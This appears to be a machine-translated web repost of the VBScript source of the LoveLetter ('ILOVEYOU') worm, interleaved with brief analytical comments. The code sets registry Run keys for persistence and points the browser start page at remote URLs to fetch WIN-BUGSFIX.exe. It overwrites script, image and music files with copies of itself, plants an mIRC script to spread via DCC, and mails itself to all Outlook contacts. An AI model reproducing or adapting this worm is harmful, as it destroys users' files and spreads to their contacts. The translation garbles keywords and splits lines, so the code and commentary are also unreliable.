VBS.loveletter.ci virus source code

xiaoxiao2021-04-01  226

Rem Barok -loveletter (Vbe) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines "Note: Program author's signature (possibly)

On Error Resume Next dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow eq = "" ctr = 0 Set fso = CreateObject ( "Scripting.FileSystemObject") "Notes: FileSystemObject is M $ VBVM system The most dangerous part, its function is very powerful

"You can know from the virus using FSO. By modifying the registry, you can easily prevent the LETTER episode.

Set file = fso.opentextfile (wscript.scriptfullname, 1) vbscopy = file.readall main () "Note - Program initialization is completed.

sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" "Note - Prevents the end of the program caused by the timeout." It should be said that the programmer who wrote the virus is taken into account. Problem may occur, this is worth all of the programmer. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) "Get the name of the system key folder" VB can be used when programming.

Set c = fso.getfile (wscript.scriptfullname) C.copy (Dirsystem & "/ mskernel32.vbs") c.copy (Dirwin & "/ Win32dll.vbs") C. Copy (Dirsystem & "/ Love-letter-for-you. TXT.VBS ")" Copy itself to the key directory. "The file name is not very good. It's easy to find it.

Regruns () HTML () Spreadtoemail () ListAdriv () End Sub Regruns () "Modify the Registry to Automatically load the virus program" Prevention: This branch in the registry is often checked. "The known method also puts HTA in the Startup folder. The method used by the virus program is more advanced," because it does not fail because of language problems.

On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"

/WIN-BUGSFIX.EXE "Regcreate" HKEY_CURRENT_USER / SOFTWARE / Microsoft / Internet Explorer / Main / Start Page "," About: Blank "End If Sub Sub ListAdriv" traverses all drives. ON Error Resume Next DIM D, DC, S set DC = fso.drives for Each D in DC if D.driveType = 2 or D.DriveType = 3 THEN FOLDERLIST (D.Path & "/") end if Next ListAdriv = s end Sub Sub InfectFiles (Folderspec) "Performs the operation of the infectious file.

On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files for Each F1 in fc ext = fso.getextensionName (F1. PATH) EXT = LCASE (EXT) S = LCase (f1.name) IF (ext = "VBS") or (ext = "vbe") THEN SET AP = FSO.OpenTextFile (f1.path, 2, true) AP. Write vbscopy ap.close elseif (ext = "js") or (ext = "css") or (ext = "wsh") or (ext = "sct") or (ext = " HTA ") THENTETFILE (f1.path, 2, true) ap.write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (Folderspec & "/" & BNAME & ". VBS") fso.deletefile (f1.path) elseif (ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextfile (f1.path, 2, true ) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) Cop.copy (f1.path & ". vbs") fso.deletefile (f1.path) elseif (ext = "mp3") or (ext = "MP2") THEN SET MP3 = fso.createteTextFile (f1.path & ". vbs") mp3.write vbscopy mp3.close set att = fso.getfile (f1.path) att.attributes = att.attributes 2 end if IF (EQ <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlin K32.exe ") or (s =" mirc.ini ") or (s =" scri pt.ini ") or (s =" mirc.hlp ") THEN SET Scriptini = fso.createteTextFile (Folderspec &" / Script.ini ") scriptini.WriteLine" [script] "scriptini.WriteLine"; mIRC Script "scriptini.WriteLine"; Please dont edit this script ... mIRC will corru pt, if mIRC will "scriptini.WriteLine" corrupt ... WINDOWS will Affect And Will NOT RUN CORRECTLY. THANKS ""

The English language of the viral author is probably not learning ... but, this is enough to scare people. "Here, you will remind you to pay attention, don't care about those scary words, you will find a lot of vulnerabilities. Scriptini.writeline"; "scriptini.writeline"; khaled mardam-bey "scriptini.writeline"; http: // www. Mirc.com "scriptini.writeline"; "scriptini.writeline" n0 = on 1: join: #: {"scriptini.writeLine" n1 = / if ($ nick == $ me) {halt} "scriptini.writeline" N2 = /.dcc send $ nick "& Dirsystem &" / Love-letter-fo r-you.htm "Scriptini.writeLine" N3 =} "" Note that the result of this is that MIRC can also communicate viruses. scriptini.close eq = folderspec end if end if next end sub sub folderlist (folderspec) "Traverse Folder On Error Resume Next dim f, f1, sf set f = fso.GetFolder (folderspec) set sf = f.SubFolders for each f1 In sf infectfiles (f1.path) folderlist (f1.path) NEXT End Sub sub regreate (regKey, regval) "Modify the registry (creating key)" This program seems to be Microsoft's demonstration program. SET regedit = CreateObject ("WScript .Shell ") regedit.regWrite Regkey, RegValue End Sub Function Regget (Value) This program seems to be a Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) SET regedit = CreateObject ("wscript.shell") regget = regedit.regread (value) End function function fileexist (filespec) "Decision file" purely from technical perspective, this program Write not good. "Don't write so long, you can achieve the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function function folderexist (folderspec)" judgment folder Whether it exists "as the last program is as stinking.

On Error Resume Next dim msg if (fso.GetFolderExists (folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail () "diffusion On Error Resume Next dim x by e-mail, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( "Outlook.Application") "virus limitations: only supports Outlook, and Outlook Express is not supported . set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "Iloveyou" "The reason" of the virus "see such a message, is definitely a virus. "People who don't have normal minds will not don't do it.

转载请注明原文地址:https://www.9cbs.com/read-131155.html

New Post(0)